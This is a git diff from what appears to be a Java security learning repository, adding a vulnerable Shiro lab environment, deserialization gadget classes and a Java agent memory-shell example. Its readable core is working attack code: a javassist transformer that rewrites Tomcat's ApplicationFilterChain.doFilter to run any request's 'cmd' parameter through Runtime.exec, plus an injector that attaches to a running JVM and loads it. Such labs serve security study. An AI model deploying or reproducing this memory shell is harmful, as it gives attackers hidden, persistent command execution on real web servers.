Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-context-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-core-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-core-5.3.22.jar
new file mode 100644
index 00000000..c6685090
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-core-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-expression-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-expression-5.3.22.jar
new file mode 100644
index 00000000..ceaaf793
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-expression-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-jcl-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-jcl-5.3.22.jar
new file mode 100644
index 00000000..6d125c09
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-jcl-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-web-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-web-5.3.22.jar
new file mode 100644
index 00000000..f6b6e668
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-web-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-webmvc-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-webmvc-5.3.22.jar
new file mode 100644
index 00000000..beb27e73
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-webmvc-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-core-9.0.65.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-core-9.0.65.jar
new file mode 100644
index 00000000..667ca462
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-core-9.0.65.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-el-9.0.65.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-el-9.0.65.jar
new file mode 100644
index 00000000..e54e0845
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-el-9.0.65.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-websocket-9.0.65.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-websocket-9.0.65.jar
new file mode 100644
index 00000000..f2bd484e
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/tomcat-embed-websocket-9.0.65.jar differ
diff --git a/JavaSecurity/Jackson/ctf-0.0.1-SNAPSHOT.jar b/JavaSecurity/Jackson/ctf-0.0.1-SNAPSHOT.jar
new file mode 100644
index 00000000..d85d7d67
Binary files /dev/null and b/JavaSecurity/Jackson/ctf-0.0.1-SNAPSHOT.jar differ
diff --git "a/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/java/com/drunkbaby/ssti/VulTest/test.java" "b/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/java/com/drunkbaby/ssti/VulTest/test.java"
new file mode 100644
index 00000000..16fb5289
--- /dev/null
+++ "b/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/java/com/drunkbaby/ssti/VulTest/test.java"	
@@ -0,0 +1,23 @@
+package com.drunkbaby.ssti.VulTest;
+
+import org.apache.velocity.Template;
+import org.apache.velocity.VelocityContext;
+import org.apache.velocity.app.VelocityEngine;
+
+import java.io.StringWriter;
+import java.util.Properties;
+
+public class test {
+ public static void main(String[] args) throws Exception {
+ Properties p = new Properties();
+ VelocityEngine velocity = new VelocityEngine();
+ velocity.init(p);
+
+ Template template = velocity.getTemplate("test.vm");
+ VelocityContext context = new VelocityContext();
+ StringWriter writer = new StringWriter();
+ template.merge(context, writer);
+ writer.flush();
+ System.out.println(writer.toString());
+ }
+}
diff --git "a/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/resources/lib/com.atlassian.confluence_confluence-8.5.3.jar" "b/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/resources/lib/com.atlassian.confluence_confluence-8.5.3.jar"
new file mode 100644
index 00000000..5bc5ccec
Binary files /dev/null and "b/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/resources/lib/com.atlassian.confluence_confluence-8.5.3.jar" differ
diff --git "a/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/resources/test.vm" "b/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/resources/test.vm"
new file mode 100644
index 00000000..82571e1e
--- /dev/null
+++ "b/JavaSecurity/Java 344円273円243円347円240円201円345円256円241円350円256円241円/CodeReview/JavaSec-Code/SSTI/src/main/resources/test.vm"	
@@ -0,0 +1 @@
+<p>test</p>
\ No newline at end of file
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/application.properties" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/application.properties"
new file mode 100644
index 00000000..4d360de1
--- /dev/null
+++ "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/application.properties"	
@@ -0,0 +1 @@
+server.port=8081
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Controller/UserController.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Controller/UserController.class"
new file mode 100644
index 00000000..f63f9f4a
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Controller/UserController.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Shiro/MainRealm.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Shiro/MainRealm.class"
new file mode 100644
index 00000000..79d49a6d
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Shiro/MainRealm.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class"
new file mode 100644
index 00000000..870b53cc
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/ShirodemoApplication.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/ShirodemoApplication.class"
new file mode 100644
index 00000000..17f1001d
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/classes/com/shiro/vuln/ShirodemoApplication.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/AESEncode.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/AESEncode.class"
new file mode 100644
index 00000000..b7b80496
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/AESEncode.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/CC11Template.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/CC11Template.class"
new file mode 100644
index 00000000..e55781cc
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/CC11Template.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/CommonsBeanutils.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/CommonsBeanutils.class"
new file mode 100644
index 00000000..9ddd3d87
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/CommonsBeanutils.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/TomcatHeaderSize.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/TomcatHeaderSize.class"
new file mode 100644
index 00000000..56808dc4
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/TomcatHeaderSize.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/TomcatMemShellInject.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/TomcatMemShellInject.class"
new file mode 100644
index 00000000..47592526
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/TomcatMemShellInject.class" differ
diff --git "a/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/com/shiro/vuln/shirodemo/ShirodemoApplicationTests.class" "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/com/shiro/vuln/shirodemo/ShirodemoApplicationTests.class"
new file mode 100644
index 00000000..90696881
Binary files /dev/null and "b/JavaSecurity/Java 345円233円236円346円230円276円346円212円200円346円234円257円/TomcatHalfEcho/ShiroVulnEnv/target/test-classes/com/shiro/vuln/shirodemo/ShirodemoApplicationTests.class" differ
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/.gitignore b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/pom.xml
new file mode 100644
index 00000000..3e80708d
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/pom.xml
@@ -0,0 +1,55 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>AgentInjectionExample</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - AgentInjectionExample</name>
+ <url>http://maven.apache.org</url>
+ <dependencies>
+ <dependency>
+ <groupid>org.javassist</groupid>
+ <artifactid>javassist</artifactid>
+ <version>3.27.0-GA</version>
+ </dependency>
+ <dependency>
+ <groupid>commons-collections</groupid>
+ <artifactid>commons-collections</artifactid>
+ <version>3.2.1</version>
+ </dependency>
+ <dependency>
+ <groupid>com.sun</groupid>
+ <artifactid>tools</artifactid>
+ <version>1.8.0</version>
+ <scope>system</scope>
+ <systempath>D:\\SoftWares\\LanguageEnv\\Java\8円u321\\lib\\tools.jar</systempath>
+ </dependency>
+ </dependencies>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-assembly-plugin</artifactid>
+ <version>2.6</version>
+ <configuration>
+ <descriptorrefs>
+ <descriptorref>jar-with-dependencies</descriptorref>
+ </descriptorrefs>
+ <archive>
+ <manifestfile>
+ src/main/resources/META-INF/maven/MAINFEST.MF
+ </manifestfile>
+ </archive>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>6</source>
+ <target>6</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/Filter_Transform.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/Filter_Transform.java
new file mode 100644
index 00000000..a03cd5e4
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/Filter_Transform.java
@@ -0,0 +1,51 @@
+package com.drunkbaby;
+
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtMethod;
+
+import java.lang.instrument.ClassFileTransformer;
+import java.lang.instrument.IllegalClassFormatException;
+import java.security.ProtectionDomain;
+
+public class Filter_Transform implements ClassFileTransformer {
+ @Override
+ public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
+ try {
+
+ //获取CtClass 对象的容器 ClassPool
+ ClassPool classPool = ClassPool.getDefault();
+
+ //添加额外的类搜索路径
+ if (classBeingRedefined != null) {
+ ClassClassPath ccp = new ClassClassPath(classBeingRedefined);
+ classPool.insertClassPath(ccp);
+ }
+
+ //获取目标类
+ CtClass ctClass = classPool.get("org.apache.catalina.core.ApplicationFilterChain");
+
+ //获取目标方法
+ CtMethod ctMethod = ctClass.getDeclaredMethod("doFilter");
+
+ //设置方法体
+ String body = "{" +
+ "javax.servlet.http.HttpServletRequest request = 1ドル\n;" +
+ "String cmd=request.getParameter(\"cmd\");\n" +
+ "if (cmd !=null){\n" +
+ " Runtime.getRuntime().exec(cmd);\n" +
+ " }"+
+ "}";
+ ctMethod.setBody(body);
+
+ //返回目标类字节码
+ byte[] bytes = ctClass.toBytecode();
+ return bytes;
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ return null;
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/Inject_Agent.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/Inject_Agent.java
new file mode 100644
index 00000000..e48104f5
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/Inject_Agent.java
@@ -0,0 +1,27 @@
+package com.drunkbaby;
+
+import com.sun.tools.attach.*;
+
+import java.io.IOException;
+import java.util.List;
+
+public class Inject_Agent {
+ public static void main(String[] args) throws IOException, AttachNotSupportedException, AgentLoadException, AgentInitializationException, AttachNotSupportedException, AgentLoadException, AgentInitializationException, AgentLoadException, AgentInitializationException, AttachNotSupportedException, AgentLoadException, AgentInitializationException, AgentLoadException, AgentInitializationException, AgentLoadException, AgentInitializationException {
+ //调用VirtualMachine.list()获取正在运行的JVM列表
+ List<virtualmachinedescriptor> list = VirtualMachine.list();
+ for(VirtualMachineDescriptor vmd : list){
+ System.out.println(vmd.displayName());
+ //遍历每一个正在运行的JVM,如果JVM名称为Sleep_Hello则连接该JVM并加载特定Agent
+ if(vmd.displayName().contains("JavaAgentSpringBootApplication")){
+
+ //连接指定JVM
+ VirtualMachine virtualMachine = VirtualMachine.attach(vmd.id());
+ //加载Agent
+ virtualMachine.loadAgent("E:\\Coding\\Java\\JavaSecurityLearning\\JavaSecurity\\MemoryShell\\Java-Agent-Memshell\\AgentInjectionExample\\target\\AgentInjectionExample-1.0-SNAPSHOT-jar-with-dependencies.jar");
+ //断开JVM连接
+ virtualMachine.detach();
+ }
+
+ }
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/agentmain_transform.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/agentmain_transform.java
new file mode 100644
index 00000000..16b0b868
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/java/com/drunkbaby/agentmain_transform.java
@@ -0,0 +1,21 @@
+package com.drunkbaby;
+
+import java.lang.instrument.Instrumentation;
+import java.lang.instrument.UnmodifiableClassException;
+
+public class agentmain_transform {
+ public static void agentmain(String args, Instrumentation inst) throws InterruptedException, UnmodifiableClassException {
+ Class [] classes = inst.getAllLoadedClasses();
+
+ //获取目标JVM加载的全部类
+ for(Class cls : classes){
+ if (cls.getName().equals("org.apache.catalina.core.ApplicationFilterChain")){
+
+ //添加一个transformer到Instrumentation,并重新触发目标类加载
+ inst.addTransformer(new Filter_Transform(),true);
+ inst.retransformClasses(cls);
+ }
+ }
+ }
+}
+
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/META-INF/maven/MAINFEST.MF b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/META-INF/maven/MAINFEST.MF
new file mode 100644
index 00000000..34afaf27
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/META-INF/maven/MAINFEST.MF
@@ -0,0 +1,4 @@
+Manifest-Version: 1.0
+Agent-Class: com.drunkbaby.agentmain_transform
+Can-Redefine-Classes: true
+Can-Retransform-Classes: true
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/META-INF/maven/archetype.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/META-INF/maven/archetype.xml
new file mode 100644
index 00000000..772b6c93
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/META-INF/maven/archetype.xml
@@ -0,0 +1,9 @@
+<archetype>
+ <id>AgentInjectionExample</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..e863d602
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$AgentInjectionExample</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/AgentInjectionExample/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/.gitignore b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/pom.xml
new file mode 100644
index 00000000..5653145e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/pom.xml
@@ -0,0 +1,45 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>Agentmain</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - Agentmain</name>
+ <dependencies>
+ <dependency>
+ <groupid>com.sun</groupid>
+ <artifactid>tools</artifactid>
+ <version>1.8.0</version>
+ <scope>system</scope>
+ <systempath>D:\\SoftWares\\LanguageEnv\\Java\8円u321\\lib\\tools.jar</systempath>
+ </dependency>
+ </dependencies>
+ <url>http://maven.apache.org</url>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-assembly-plugin</artifactid>
+ <version>2.6</version>
+ <configuration>
+ <descriptorrefs>
+ <descriptorref>jar-with-dependencies</descriptorref>
+ </descriptorrefs>
+ <archive>
+ <manifestfile>
+ src/main/resources/META-INF/MAINFEST.MF
+ </manifestfile>
+ </archive>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>6</source>
+ <target>6</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Inject_Agent.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Inject_Agent.java
new file mode 100644
index 00000000..cc270f94
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Inject_Agent.java
@@ -0,0 +1,26 @@
+package com.drunkbaby;
+
+import com.sun.tools.attach.*;
+
+import java.io.IOException;
+import java.util.List;
+
+public class Inject_Agent {
+ public static void main(String[] args) throws IOException, AttachNotSupportedException, AgentLoadException, AgentInitializationException {
+ //调用VirtualMachine.list()获取正在运行的JVM列表
+ List<virtualmachinedescriptor> list = VirtualMachine.list();
+ for(VirtualMachineDescriptor vmd : list){
+ //遍历每一个正在运行的JVM,如果JVM名称为Sleep_Hello则连接该JVM并加载特定Agent
+ if(vmd.displayName().equals("com.drunkbaby.Sleep_Hello")){
+
+ //连接指定JVM
+ VirtualMachine virtualMachine = VirtualMachine.attach(vmd.id());
+ //加载Agent
+ virtualMachine.loadAgent("E:\\Coding\\Java\\Java-Agent-Memshell\\Agentmain\\target\\Agentmain-1.0-SNAPSHOT-jar-with-dependencies.jar");
+ //断开JVM连接
+ virtualMachine.detach();
+ }
+
+ }
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Java_Agent_agentmain.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Java_Agent_agentmain.java
new file mode 100644
index 00000000..bafcfd11
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Java_Agent_agentmain.java
@@ -0,0 +1,14 @@
+package com.drunkbaby;
+
+import java.lang.instrument.Instrumentation;
+
+import static java.lang.Thread.sleep;
+
+public class Java_Agent_agentmain {
+ public static void agentmain(String args, Instrumentation inst) throws InterruptedException {
+ while (true){
+ System.out.println("调用了agentmain-Agent!");
+ sleep(3000);
+ }
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Sleep_Hello.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Sleep_Hello.java
new file mode 100644
index 00000000..746c0f7e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/Sleep_Hello.java
@@ -0,0 +1,12 @@
+package com.drunkbaby;
+
+import static java.lang.Thread.sleep;
+
+public class Sleep_Hello {
+ public static void main(String[] args) throws InterruptedException {
+ while (true){
+ System.out.println("Hello World!");
+ sleep(5000);
+ }
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/get_PID.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/get_PID.java
new file mode 100644
